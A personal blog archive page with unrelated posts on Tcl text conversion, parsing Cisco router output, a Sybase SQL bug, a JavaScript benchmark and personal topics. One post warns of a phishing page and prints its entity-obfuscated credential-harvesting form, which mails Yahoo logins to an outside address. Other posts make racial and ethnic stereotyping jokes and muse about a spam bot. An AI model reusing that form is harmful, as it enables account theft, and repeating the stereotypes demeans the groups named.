Normalize ISO-8859-1 to ASCII in Tcl

A co-worker, John, asked me, “How do I normalize ISO-8859-1 encoded text to ASCII in Tcl?” From the command line, you might use GNU recode like this:

$ echo "Mötley Crüe" | recode -f L1..BS | sed -e 's/.\x08//g'
Motley Crue

Fortunately, recode can dump its conversion table, but it currently only knows how to emit C and Perl source. After a little post-processing of that output, I generated this Tcl list:

set ::ISO_8859_1_to_ASCII [list \
    "" "\001" "\002" "\003" "\004" "\005" "\006" "\007" "\010" "\011" \
    "\012" "\013" "\014" "\015" "\016" "\017" "\020" "\021" "\022" "\023" \
    "\024" "\025" "\026" "\027" "\030" "\031" "\032" "\033" "\034" "\035" \
    "\036" "\037" " " "!" "\"" "#" "\$" "%" "&" "'" "(" ")" "*" "+" "," \
    "-" "." "/" "0" "1" "2" "3" "4" "5" "6" "7" "8" "9" ":" ";" "<" "=" \
    ">" "?" "@" "A" "B" "C" "D" "E" "F" "G" "H" "I" "J" "K" "L" "M" "N" \
    "O" "P" "Q" "R" "S" "T" "U" "V" "W" "X" "Y" "Z" "\[" "\\" "]" "^" "_" \
    "`" "a" "b" "c" "d" "e" "f" "g" "h" "i" "j" "k" "l" "m" "n" "o" "p" \
    "q" "r" "s" "t" "u" "v" "w" "x" "y" "z" "{" "|" "}" "~" "\177" "" \
    "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" \
    "" "" "" "" "" "" "" "" " " "" "" "" "" "" "" "" "" "" "" "\"" "" "" \
    "" "" "" "" "" "" "" "" "" "" "" "" "" "\"" "" "" "" "" "A" "A" "A" \
    "A" "A" "" "" "C" "E" "E" "E" "E" "I" "I" "I" "I" "" "N" "O" "O" "O" \
    "O" "O" "" "O" "U" "U" "U" "U" "Y" "" "s" "a" "a" "a" "a" "a" "" "" \
    "c" "e" "e" "e" "e" "i" "i" "i" "i" "" "n" "o" "o" "o" "o" "o" "" "o" \
    "u" "u" "u" "u" "y" "" "y" \
]

proc ISO_8859_1_to_ASCII {in} {
    global ISO_8859_1_to_ASCII
    set out {}
    foreach c [split $in ""] {
        append out [lindex $ISO_8859_1_to_ASCII [scan $c "%c"]]
    }
    return $out
}

Once you’ve sourced this code into your Tcl script, you can use it like this:

% ISO_8859_1_to_ASCII "Mötley Crüe"
Motley Crue
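For comparison, the same kind of normalization can be sketched without a hand-built table by using Unicode decomposition. This Python sketch is my addition, not part of the recode-based approach above:

```python
import unicodedata

def latin1_to_ascii(text: str) -> str:
    # Decompose accented characters (e.g. "ö" becomes "o" plus a combining
    # diaeresis), then drop the combining marks by encoding to ASCII with
    # errors ignored. Note: unlike the table above, this drops characters
    # like the German sharp s entirely instead of mapping them to "s".
    decomposed = unicodedata.normalize("NFKD", text)
    return decomposed.encode("ascii", "ignore").decode("ascii")

print(latin1_to_ascii("Mötley Crüe"))  # Motley Crue
```

The table-driven Tcl version gives you full control over each mapping; the decomposition approach trades that control for not having to maintain a table.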

I hope this helps others, too.


Is there any hope for a Silicon Alley?

A couple of months ago, Holly and I were talking about Silicon Valley and wondering whether the same phenomenon could be reproduced elsewhere, specifically in New York, because I really don’t want to leave New Jersey. I didn’t have many good answers, but a few days ago, Guy Kawasaki gave an excellent one: How to Kick Silicon Valley’s Butt.

The entire entry is worth reading, but I just wanted to take a quote completely out of context because I still can’t stop smiling when I read it:

“[…] if you want to cover your ass, you need to open your kimono […]”

The depressing part of reading Guy’s blog entry is, if he’s right and I suspect he is, it’s not very likely that there’ll be another “Silicon Valley” elsewhere because the preconditions just aren’t there. Yet.


How to parse “show flow monitor-map” output with Tcl

I’m the organizer of a few Meetups, the most successful so far being the MySQL Meetup. However, I also started a Tcl Meetup, and today a new member, Maryam (or “Moryam”), joined and sent me a message asking a Tcl question. I decided to answer it on my blog so that others could see the answer too.

Her question is: How can I parse the output of “show flow monitor-map” from Cisco IOS into a “keyed list” (or Tcl array)?

Here is what she sent me as sample input and desired sample output:

RP/0/RP1/CPU0:irace-netflow-r1#show flow monitor-map

Flow Monitor Map : fmm1
-------------------------------------------------
Id: 1
RecordMapName: ipv4-raw
ExportMapName: fem1
CacheAgingMode: Normal
CacheMaxEntries: 65535
CacheActiveTout: 1800 seconds
CacheInactiveTout: 15 seconds
CacheUpdateTout: N/A

flowMonitorMap {
    {identifier fmm1}
    {id 1}
    {recordMapName ipv4-raw}
    {exportMapName fem1}
    {cacheAgingMode Normal}
    { cacheMaxEntries 65535}
    {cacheActiveTout 1800}
    { cacheActiveToutUnit Seconds}
    {cacheInactiveTout 15}
    {cacheInactiveToutUnit Seconds}
    {cacheUpdateTout N/A}
}

I’m going to assume that all the network I/O required (probably using something like Expect to automate that task) has already been implemented. For the sake of the code example, I’m putting the output of the “show flow monitor-map” into the variable $input. The result of the parsing will go into a Tcl array, which is an unordered set of key-value pairs. Here is the code:

##
## Set input data.
##

set input {Flow Monitor Map : fmm1
-------------------------------------------------
Id: 1
RecordMapName: ipv4-raw
ExportMapName: fem1
CacheAgingMode: Normal
CacheMaxEntries: 65535
CacheActiveTout: 1800 seconds
CacheInactiveTout: 15 seconds
CacheUpdateTout: N/A}

##
## Initialize output array
##

array unset output
array set output {}

##
## Parse input data, populate output array.
##

foreach line [split $input "\n"] {
    if {[regexp {^([^:]+?)\s*:\s*(\S+)\s*(\S+)?$} $line -> key value units]} {
        if {$key eq "Flow Monitor Map"} {
            set key "identifier"
        }
        set key [string tolower $key 0 0]
        set output($key) $value
        if {[string length $units]} {
            set output(${key}Unit) $units
        }
    }
}

##
## Optional: Display the output.
##

foreach {key value} [array get output] {
    puts [list $key $value]
}

Running this Tcl script produces this output:

cacheActiveToutUnit seconds
cacheActiveTout 1800
cacheMaxEntries 65535
exportMapName fem1
id 1
recordMapName ipv4-raw
cacheUpdateTout N/A
cacheInactiveToutUnit seconds
cacheInactiveTout 15
cacheAgingMode Normal
identifier fmm1

Remember, Tcl arrays are unordered collections (hash tables, not lists), which is why the key-value pairs come back in a different order than they went in. If you need them ordered, you’ll have to specify the ordering yourself, perhaps like this:

foreach key {identifier id recordMapName exportMapName cacheAgingMode
        cacheMaxEntries cacheActiveTout cacheActiveToutUnit
        cacheInactiveTout cacheInactiveToutUnit
        cacheUpdateTout cacheUpdateToutUnit} {
    if {[info exists output($key)]} {
        puts [list $key $output($key)]
    }
}

This will produce the following output:

identifier fmm1
id 1
recordMapName ipv4-raw
exportMapName fem1
cacheAgingMode Normal
cacheMaxEntries 65535
cacheActiveTout 1800
cacheActiveToutUnit seconds
cacheInactiveTout 15
cacheInactiveToutUnit seconds
cacheUpdateTout N/A
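For readers more comfortable outside Tcl, the same parse can be sketched in Python, with a dict playing the role of the Tcl array. This is my translation, not part of Maryam’s question:

```python
import re

def parse_monitor_map(text: str) -> dict:
    """Parse 'Key: value [units]' lines into a dict, mirroring the Tcl code."""
    output = {}
    for line in text.splitlines():
        # Same pattern as the Tcl regexp: key, value, and optional units.
        m = re.match(r"^([^:]+?)\s*:\s*(\S+)\s*(\S+)?$", line)
        if not m:
            continue
        key, value, units = m.groups()
        if key == "Flow Monitor Map":
            key = "identifier"
        key = key[0].lower() + key[1:]  # lowercase only the first character
        output[key] = value
        if units:
            output[key + "Unit"] = units
    return output

sample = """Flow Monitor Map : fmm1
Id: 1
RecordMapName: ipv4-raw
CacheActiveTout: 1800 seconds"""

print(parse_monitor_map(sample))
```

As with the Tcl array, a plain dict does the job because each key appears only once in the input.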

Maryam, I hope this answers your question, and helps anyone else looking to accomplish a similar task. Have questions or comments about the code? Leave them in the comments section below!


Dossy’s hCard, if you care about microformats

As Tantek Çelik announced on his blog, Technorati now has a Microformats Search in their Kitchen (beta). Just in case this actually takes off, I figured I’d put my publicly available contact information out there in hCard microformat. Here it is:

Nothing really exciting (that’s almost the point) but it’ll be interesting to see where this information will surface, now that it’s more easily machine-readable.

It’ll also be a fun exercise to create a web spam bot that generates a bunch of seemingly real but completely fabricated microcontent. Without the necessary licensing, Technorati can’t use Google’s patented PageRank process to determine authoritativeness or relevancy from links to microcontent, can it? Just look at spam blogs now and how they’re ruining blog search. Spam microcontent won’t be far behind, if microcontent search becomes a reality.


Alert: “pupzz2000” phishing attack via Yahoo! Geocities

http://geocities.com/pupzz2000/

This URL is being sent around via IM. It’s a very convincing page that looks like a login for Yahoo! Photos, circulated by what I suspect is a virus/trojan that uses AIM to propagate, since I received the URL in an IM from someone I knew.

Looking at the page’s source (as I was skeptical about having to log into Yahoo! Photos at a geocities.com URL), I found:

<FORM METHOD="POST" ACTION="&#104;&#116;&#116;&#112;://&#119;&#119;&#119;&#050;&#046;&#102;&#105;&#098;&#101;&#114;&#098;&#105;&#116;&#046;&#110;&#101;&#116;/&#102;&#111;&#114;&#109;/&#109;&#097;&#105;&#108;&#116;&#111;&#046;&#099;&#103;&#105;" ENCTYPE="x-www-form-urlencoded">

	<INPUT TYPE="hidden" NAME="Mail_From" VALUE="Yahoo">
    <INPUT TYPE="hidden" NAME="Mail_To" VALUE="dielameragainlol@googlemail.com">
    <INPUT TYPE="hidden" NAME="Mail_Subject" VALUE="Yahoo id">

Decoding that form ACTION, it is the following URL:

http://www2.fiberbit.net/form/mailto.cgi
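Decoding those numeric character references is mechanical. Here’s a small Python sketch of how it works (the code is mine, for illustration; it’s not from the phishing page):

```python
import re

def decode_numeric_entities(s: str) -> str:
    # Replace decimal character references like "&#104;" with the character
    # they encode (chr(104) == "h").
    return re.sub(r"&#(\d+);", lambda m: chr(int(m.group(1))), s)

print(decode_numeric_entities("&#104;&#116;&#116;&#112;://"))  # http://
```

Python’s standard `html.unescape` handles the same job, plus named and hexadecimal entities.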

This Geocities page needs to be shut down ASAP, before too many people get their Yahoo! accounts compromised. I’ve already sent a message to Yahoo! via its abuse web contact form. Keep on the lookout for this kind of thing.


“SELECT DISTINCT … ORDER BY” is broken in Sybase ASE 12.5.3

So, last night I was running into broken behavior in Sybase 12.5.3 with SELECT COUNT(DISTINCT columnname) ..., which surprised me, but I could at least rationalize why it was happening. Today, I found an outright bug: mixing SELECT DISTINCT ... with an ORDER BY clause gives the wrong results. Here’s a quick session that demonstrates what I’m talking about:

1> SELECT @@version; -m bcp
Adaptive Server Enterprise/12.5.3/EBF 12331 ESD#1/P/Sun_svr4/OS 5.8/ase1253/1900/64-bit/FBO/Tue Jan 25 08:52:58 2005|

1> CREATE TABLE #test (x int, y int);

1> INSERT INTO #test (x, y) VALUES (1, 2);
(1 row affected)
1> INSERT INTO #test (x, y) VALUES (1, 10);
(1 row affected)
1> INSERT INTO #test (x, y) VALUES (2, 1);
(1 row affected)
1> INSERT INTO #test (x, y) VALUES (2, 5);
(1 row affected)
1> INSERT INTO #test (x, y) VALUES (3, 4);
(1 row affected)
1> INSERT INTO #test (x, y) VALUES (3, 7);
(1 row affected)

1> SELECT DISTINCT x FROM #test ORDER BY y DESC;
 x
 -----------
           1
           3
           2
           3
           1
           2
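Whatever ordering the engine picks, a DISTINCT result should never contain duplicate rows. Here’s a quick Python sketch (my interpretation, not Sybase’s documented semantics) of one sane reading of that query, ordering each distinct x by the largest y seen for it:

```python
from collections import defaultdict

# The six rows inserted into #test above.
rows = [(1, 2), (1, 10), (2, 1), (2, 5), (3, 4), (3, 7)]

# One sane reading of "SELECT DISTINCT x ... ORDER BY y DESC": order the
# distinct x values by the largest y associated with each x.
max_y = defaultdict(int)
for x, y in rows:
    max_y[x] = max(max_y[x], y)

result = sorted(max_y, key=lambda x: max_y[x], reverse=True)
print(result)  # [1, 3, 2] -- three rows, no duplicates
```

Three distinct values in, three rows out; Sybase returning six rows is wrong under any interpretation.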

Has this been fixed in a newer version of Sybase? Strictly speaking, ordering by a column that isn’t in the select list of a DISTINCT query is ambiguous, and standard SQL disallows it, but silently returning duplicate rows can’t be the right behavior.

Supporting Rob Levin is like supporting the PDPC

Rob Levin, the founder of PDPC (the Peer-Directed Projects Center) blogs about being under attack from Patrick McFarland. You can read Patrick’s side here, where I left a comment. Since I’m concerned that the comment won’t be published, I want to repost it here in my own blog:

If you think raising funds to support Rob Levin through the Spinhome project doesn’t benefit PDPC, Freenode, and their benefactors, then you aren’t smart enough to successfully “liberate” the Freenode IRC network and PDPC. Rob has contributed a good portion of his life, has sacrificed much, has been living close to the poverty level while supporting a spouse and a young child on the generosity of the community, and has persevered through much grief heaped upon him by others who haven’t accomplished even a small fraction of what Rob already has. Supporting such a person, enabling him to continue giving what he already gives selflessly, is a win-win for everyone involved.

If you have real, tangible criticisms of PDPC and/or Freenode (or even Rob Levin, himself), I suggest you think them through and express them in an intelligible way. While everyone has their emotional moments, generally adults respond better to reasonable people more than they do to ad hominem attacks.

The way you are currently going about things will accomplish very little.

The sad reality is that any time you provide a service, there will always be customers who you just can’t satisfy. Perhaps Patrick is just one of those people. The fact still remains that Rob is trying to raise funds through his Spinhome project, to help improve his situation so he can continue to focus on improving PDPC and Freenode, which almost 30,000 people benefit from every day. His fundraising goal is in the ballpark of $300K, which might sound high, but just think: if each one of those 30,000 people donated $10, he’d hit his goal. However, since this is a personal project and Rob has very firm convictions about not using PDPC or Freenode for his own personal gain, he won’t even consider directly soliciting support from Freenode’s many users.

Well, as his friend and someone who benefits from his services (the #aolserver IRC chat is hosted on Freenode), I’d like to ask that if you also use Freenode, consider taking the time to make a one-time donation of $8 or $16 to his Spinhome fund. If you know people with open source projects who use Freenode, please pass the word along to them. A small investment from each of us will help ensure that Freenode continues to operate and improve for years to come.


Asian people just love the ghetto

Holly, who recently got me a signed copy of Naked Conversations, blogged about a fun little site she’s thrown together with a friend. The name? goghetto.com. The tagline: “Confess your ghetto ways online.”

goghetto.com: Confess your ghetto ways online.

Seems like Asian people just love the ghetto. Terry Chay shares some ghetto photos. Looks like there was much ghetto-loving at Simply Lunch 2.0 according to Mark Jen.

These online confessional sites have always been popular … like group hug and PostSecret … but goghetto.com has more bling. How can you not love that? Especially if you’re Asian!?

UPDATE: goghetto.com is up on Digg — go show your support and Digg it.


JavaScript optimization, are chained calls expensive?

Sree Kotay blogs about JavaScript a bit. (If you’re interested in more technical details, I’d recommend checking out Simon Willison’s “A (Re)-Introduction to JavaScript” presentation.) In Sree’s blog, he writes:

Part of understanding the distinction, in the trivial case, comes from the (obvious) understanding of basic JS optimization, that:

for (i=0; i<100; i++) a.b.c.d(v);

...is A LOT slower, at least in JavaScript, than:

var f=a.b.c.d;
for (i=0; i<100; i++) f(v);

...because after all, JS is a dynamic language. I'll provide some specific JavaScript performance tips and JavaScript benchmarks to make the points clearly.

Now, I intuitively understand and agree with Sree that the latter should be faster, but exactly how much faster? Are symbol lookups in modern JavaScript engines actually that slow? Don't modern JavaScript interpreters take advantage of JIT bytecode compilation and bytecode optimization, so that the former code gets optimized behind the scenes into the latter form? (Whether that's possible through static analysis, I'm not sure; I'm just throwing the question out there.)

Supposing it's not possible to optimize away the inefficiency of the first form ... what kind of performance penalty are we talking about? 1%? 10%? Is it a material difference that should drive a best practice around coding convention to avoid it? Out of sheer laziness, I'm only going to benchmark in Firefox 1.5.0.1 here on my 2.2 GHz Dell C840:

<script language="JavaScript">
var v = "Hello, world.";
var a = {
    b: {
        c: {
            d: function(arg) { return arg; }
        }
    }
};

document.write("<p>a.b.c.d(\"Hello, world.\") = " + a.b.c.d("Hello, world.") + "</p>");

var start = new Date();

for (var i = 0; i < 1000000; i++) {
    a.b.c.d(v);
}

var now = new Date();

document.write("<p>Difference: " + (now - start) + "</p>");

start = new Date();

var f = a.b.c.d;
for (var i = 0; i < 1000000; i++) {
    f(v);
}

now = new Date();

document.write("<p>Difference: " + (now - start) + "</p>");
</script>

The output:

a.b.c.d("Hello, world.") = Hello, world.

Difference: 2374

Difference: 1652

Since the JavaScript Date object provides time in milliseconds, we're seeing one million iterations in 2374 milliseconds, or about 2.4 microseconds per iteration, for the first form, versus one million iterations in 1652 milliseconds, or about 1.7 microseconds per iteration, for the second. That's a difference of roughly 0.7 microseconds per iteration, or about a 30% speedup. (Please double-check my numbers and let me know if I've gotten anything wrong.)
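To make that arithmetic easy to double-check, here is the calculation spelled out (in Python, purely for the math):

```python
# Benchmark results from the Firefox run above.
slow_ms, fast_ms, iterations = 2374, 1652, 1_000_000

slow_us = slow_ms * 1000 / iterations  # microseconds/iteration, chained lookup
fast_us = fast_ms * 1000 / iterations  # microseconds/iteration, hoisted lookup
diff_us = slow_us - fast_us            # savings per iteration
pct = (slow_ms - fast_ms) / slow_ms * 100  # savings relative to the slow form

print(round(slow_us, 3), round(fast_us, 3), round(diff_us, 3), round(pct, 1))
```

Relative to the chained form, hoisting saves about 30% of the loop's time; relative to the hoisted form, the chained version costs about 44% extra. Which percentage you quote depends on the baseline you pick.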

Okay, so that overhead is nothing to scoff at, but shaving 0.7 microseconds per iteration isn't worth optimizing away when there are likely other coding practices wasting far more time. In other words, 90% of the time spent executing a script probably isn't in that lookup overhead, so it's not where you should focus your optimization efforts.


The world’s simplest dating site?

I just love Scott Adams. Recently, he asked, “If you had to design a dating web site that matched people on just two criteria, what would those criteria be?” Call me insensitive, but here’s my answer:

  1. Number of natural teeth.
  2. Eye color.

A complete set of adult teeth should add up to 32 (including the four wisdom teeth). People with more than 32 … well, that’s a big warning flag, right? People with significantly fewer … probably live too far south or west for me to be interested in all the way up here in New Jersey. So, tooth count is a good selector, if you ask me.

Eye color is the subtle way of being racist. I mean, how many blue-eyed black people do you know? Years ago, I was told a great story about a racially sensitive parent who, upon being told by their child that they were dating a South African, wanted to subtly find out whether the person was black or white, so they asked, “What color are his eyes?” Yeah, smooth, right? Of course, most people probably have brown eyes, but for all the people who don’t, this question is probably a good selector.

So, I’m a 29-toothed brown-eyed looking for a 26-32 toothed blue-eyed. (I’ve had two wisdom teeth removed so far, and one is apparently still hiding in my gums.)